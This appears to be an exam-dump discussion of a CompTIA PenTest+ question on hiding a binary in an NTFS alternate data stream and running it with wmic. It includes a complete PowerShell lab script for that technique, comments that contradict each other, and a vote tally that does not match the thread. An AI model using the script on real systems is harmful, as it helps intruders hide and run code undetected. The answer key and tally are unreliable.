Exam PT0-002 topic 1 question 139 discussion

Actual exam question from CompTIA's PT0-002
Question #: 139
Topic #: 1

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the ymic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. ProcMon
Suggested Answer: A

Comments

ryanzou
Highly Voted 2 years, 7 months ago
Selected Answer: B
B FOR SURE
upvoted 10 times
...
cy_analyst
Highly Voted 2 years, 1 month ago
Selected Answer: A
Alternate data streams are the most likely OS or filesystem mechanism that would support running a specially crafted binary using the ymic.exe process call create function. Alternate data streams are a feature of the NTFS filesystem that allow additional data to be stored in a file's metadata, alongside the main data stream. This means that a specially crafted binary could be hidden in an alternate data stream of a legitimate file, and then executed using the ymic.exe process call create function, which allows for the execution of files located in alternate data streams.
upvoted 8 times
[Removed]
2 years, 1 month ago
It's wmic, not ymic, so B is correct.
upvoted 1 times
kinny4000
2 months, 3 weeks ago
YMIC.exe is a typo; there is no such thing unless this is a random 3rd-party executable. They are referring to WMIC.exe, which does not require any PowerShell modules to load binaries, just the WMIC.exe command-line utility.
upvoted 1 times
...
cy_analyst
2 years, 1 month ago
you are correct.
upvoted 4 times
...
cy_analyst
2 years, 1 month ago
Check this out: A. Alternate data streams is the most likely OS or filesystem mechanism to support this objective. Alternate data streams (ADS) is a feature of the Windows NTFS file system that allows data to be stored in a hidden stream of a file. This hidden stream can be accessed and executed using the wmic.exe process call create function, allowing the penetration tester to run the specially crafted binary. PowerShell modules are a collection of scripts that can be used to extend the functionality of PowerShell, but they are not directly related to running a binary using the wmic.exe process call create function. MP4 steganography involves hiding data within an MP4 video file, but this is not related to running a binary using the wmic.exe process call create function. ProcMon is a Windows utility that monitors and logs system activity, but it is not directly related to running a binary using the wmic.exe process call create function.
upvoted 2 times
cy_analyst
2 years, 1 month ago
Ok this is wrong.
upvoted 4 times
...
KingIT_ENG
2 years, 1 month ago
https://docs.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-on-a-remote-computer-by-using-powershell check
upvoted 1 times
...
...
...
[Removed]
2 years, 1 month ago
B is for sure
upvoted 1 times
...
...
kinny4000
Most Recent 2 months, 3 weeks ago
Selected Answer: A
A FOR SURE. YMIC.exe is a typo; they mean WMIC.exe, which does not require PowerShell for running binaries: it can use the built-in command-line utility to run a process call create function to read from the alternate data stream. (ADS is basically a hidden file within a file that doesn't appear in directory listings and still allows the file to run normally. WMIC.exe can call the hidden file to be executed. So can PowerShell, but this specifically asks for WMIC.exe.)
upvoted 1 times
...
Etc_Shadow28000
9 months, 3 weeks ago
Selected Answer: A
The OS or filesystem mechanism that is MOST likely to support running a specially crafted binary for later execution using the `wmic.exe process call create` function is: A. Alternate data streams
upvoted 2 times
Etc_Shadow28000
9 months, 3 weeks ago
Explanation: Analysis of Other Options: B. PowerShell modules: PowerShell modules are used to package scripts and functions for reuse in PowerShell. While they can be used to run scripts, they are not specifically related to hiding or delaying the execution of a binary through `wmic.exe`. C. MP4 steganography: This involves hiding data within MP4 video files. While it can be used to conceal data, it is not directly related to executing a binary using `wmic.exe`. D. ProcMon: ProcMon (Process Monitor) is a monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. It is not used for executing or hiding binaries. Conclusion: Alternate Data Streams (ADS) are the most suitable mechanism for supporting the objective of running a specially crafted binary for later execution using the `wmic.exe process call create` function. This technique leverages the NTFS file system's capability to hide executable code within files, allowing for stealthy execution.
upvoted 1 times
...
...
surfuganda
1 year, 1 month ago
Selected Answer: A
I'm going with: A. Alternate Data Streams. Had a similar question for CEH exam.
upvoted 3 times
...
deeden
1 year, 1 month ago
Selected Answer: A
Rewording... if I want to hide a malicious .exe file for later execution, which one should I use? Only A and C make sensible answers, but not all Windows systems keep MP4, thus ADS makes more sense.
upvoted 2 times
...
Yokota
1 year, 3 months ago
Selected Answer: A
ADS is a feature of the NTFS file system used in Windows. It allows more than one data stream to be associated with a filename, using the format filename:streamname. This feature can be used to hide files and execute them without being easily detected by users or some security software. A penetration tester could use ADS to hide the specially crafted binary and execute it later, which aligns with the objective described.
upvoted 1 times
...
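As an added example, not part of the thread and not from CompTIA, the following PowerShell session stages a binary in an NTFS alternate data stream in the `filename:streamname` form described above and then launches it with `wmic.exe process call create`. The paths `C:\Temp\notes.txt` and `C:\Temp\payload.exe` and the stream name `hidden.exe` are assumptions for a lab host; `payload.exe` stands for any harmless test binary you control.

```powershell
# Added example (not from the thread or from CompTIA): hide a binary in an NTFS
# alternate data stream (ADS) and launch it with wmic.exe process call create.
# Assumptions (not in the original question): C:\Temp is on a writable NTFS
# volume, C:\Temp\payload.exe is a harmless test binary you control, and the
# paths contain no spaces (quote them for cmd.exe if they do). Lab use only.

$hostFile   = 'C:\Temp\notes.txt'    # visible carrier file
$streamName = 'hidden.exe'           # name of the alternate stream
$payload    = 'C:\Temp\payload.exe'  # assumed test binary

# 1. Create the innocuous carrier file. Explorer and a plain "dir" report only
#    the size of this text; bytes stored in other streams are not counted.
Set-Content -Path $hostFile -Value 'meeting notes'

# 2. Copy the binary into the stream. cmd.exe's "type" plus redirection is the
#    classic way to do this; it avoids Windows PowerShell 5.1's .NET file APIs,
#    which reject "file:stream" paths.
cmd.exe /c "type $payload > ${hostFile}:${streamName}"

# 3. Confirm the stream exists and holds the full payload. The same check from
#    cmd.exe is "dir /r C:\Temp"; a Sysmon Event ID 15 (FileCreateStreamHash)
#    would also have fired here, which is what a defender looks for.
Get-Item -Path $hostFile -Stream * | Select-Object Stream, Length

# 4. Later, execute it through WMI. Win32_Process.Create accepts the stream
#    path; in the output, "ReturnValue = 0" means success and ProcessId is the
#    new process.
$result = wmic process call create "${hostFile}:${streamName}"
$result
if ($result -match 'ReturnValue = 0') { 'launched from ADS' } else { 'launch failed' }

# Cleanup: drop only the stream, leaving the carrier file intact.
Remove-Item -Path $hostFile -Stream $streamName
```

wmic.exe is deprecated and is no longer installed by default on current Windows 11 builds; where it is absent, the same WMI method is reachable from PowerShell with `Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = "${hostFile}:${streamName}" }`, which is why several commenters note that PowerShell can do this too even though the question asks about WMIC specifically.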
PhillyCheese
1 year, 4 months ago
Selected Answer: B
Windows Management Instrumentation (WMI) allows scripting languages (such as VBScript or Windows PowerShell) to manage Microsoft Windows personal computers and servers, both locally and remotely. https://en.m.wikipedia.org/wiki/Windows_Management_Instrumentation
upvoted 1 times
PhillyCheese
1 year, 4 months ago
Also, "ymic.exe" is a typo. WMIC.exe is a command-line utility that allows you to access and control Windows-based devices using Windows Management Instrumentation (WMI). WMI is a technology that lets you query and manipulate various aspects of the operating system and hardware. You can use WMIC.exe to perform tasks such as listing processes, services, users, drives, network settings, and more. You can also use WMIC.exe to execute methods, create or delete instances, and modify properties of WMI classes. WMIC.exe is compatible with existing shells and utility commands and can be used by local system administrators. https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmic
upvoted 1 times
...
...
Caoilfhion
1 year, 4 months ago
Don't overthink the question: it's not asking about how to smuggle the binary onto the system, how to hide it, or even how to create a shell with it. It's asking "how" to run a binary already there; the other information given is superfluous and meant to throw you off. While ADS can get it on there, it's not asking that. Doesn't matter (essentially) what is smuggled on there, it's asking how to run it. In this case, PowerShell is the only thing listed that will start anything. I can only stretch for ProcMon if there's a way to get ProcMon to call wmic.exe that I'm not familiar with (which is possible, I'm not sure). The scenario is stating that it will USE wmic.exe to run an already smuggled binary, but what is the best method of invoking wmic.exe first?
upvoted 1 times
...
stephyfresh13
1 year, 4 months ago
It appears there might be a typographical error in your question, as there is no commonly known tool named "ymic.exe" that I'm aware of. If you meant "wmic.exe" and there is a specific tool or concept you were referring to with "ymic.exe," please provide additional context or clarification. Assuming you are referring to "wmic.exe," here's information about it: wmic.exe (Windows Management Instrumentation Command-line) B is the correct answer
upvoted 1 times
...
pentesternoname
1 year, 5 months ago
Selected Answer: A
Alternate data streams (ADS) is a feature in NTFS (New Technology File System), the file system used by Windows operating systems, that allows additional data to be associated with a file or folder. Penetration testers and attackers can use ADS to hide data or binaries within a file without altering its size or appearance. By creating an alternate data stream and hiding a specially crafted binary within it, an attacker can execute the binary using the ymic.exe process call create function, making it a suitable choice for this objective.
upvoted 1 times
...
solutionz
1 year, 8 months ago
Selected Answer: A
Alternate Data Streams (ADS) are a feature of the NTFS file system used in Windows. They allow data to be embedded within existing files without changing their functionality or size as seen in standard file attributes. This can be exploited by attackers to hide malware or specially crafted binaries within seemingly benign files. So, in this context, the correct option for hiding a specially crafted binary for later execution using a specific process call would be: A. Alternate data streams The other options (PowerShell modules, MP4 steganography, and ProcMon) could have relevance in other contexts, but for hiding a binary within a Windows host, ADS is the most applicable choice.
upvoted 1 times
...
[Removed]
2 years ago
Alternate data streams (ADS) is a feature of the NTFS filesystem in Windows that allows a file to contain additional hidden data streams. These data streams can be accessed and manipulated by the file system API or other utilities, and can be used to store executable code, shellcode, or other malicious payloads that are not visible to the user or antivirus software. By leveraging ADS, a penetration tester can hide the payload in a legitimate-looking file, and then execute it using the ymic.exe process call create function, which will execute the hidden code along with the main program. Therefore, option A is the correct answer.
upvoted 3 times
...
KingIT_ENG
2 years, 1 month ago
B PowerShell module
upvoted 1 times
...
nickwen007
2 years, 1 month ago
The most likely OS or filesystem mechanism to support the objective of running a specially crafted binary using the ymic.exe process is A. Alternate data streams. Alternate data streams allows files to store additional data and metadata in a separate stream that is not visible when viewing the file directly, making it an ideal option for stealthy execution of malicious binaries.
upvoted 3 times
[Removed]
2 years, 1 month ago
Not ymic.exe, it's wmic.exe, so B is correct.
upvoted 2 times
cy_analyst
2 years, 1 month ago
Alternate data streams are a feature of the NTFS file system used in Windows that allow data to be hidden within a file without affecting its normal operation. This can be used by attackers to hide malicious code within a file that appears harmless to the system and its users. Using the wmic.exe process call create function, the penetration tester can create a new process and execute the binary from the alternate data stream, thereby bypassing any security measures that would normally detect and prevent the execution of the binary. Options B, C, and D are not relevant to this objective. PowerShell modules are used for scripting and automation tasks in Windows, but they do not provide a means of executing a binary from an alternate data stream. MP4 steganography involves hiding data within multimedia files, which is not applicable to this scenario. ProcMon is a process monitoring tool that can be used to analyze system activity, but it does not provide a means of executing a binary from an alternate data stream.
upvoted 2 times
...
...
...
kloug
2 years, 2 months ago
Alternate data streams are the most likely OS or filesystem mechanism to support running a specially crafted binary for later execution using the wmic.exe process call
upvoted 1 times
[Removed]
2 years, 2 months ago
B is the answer: PowerShell.
upvoted 2 times
...
...
[Removed]
2 years, 2 months ago
B is answer
upvoted 2 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other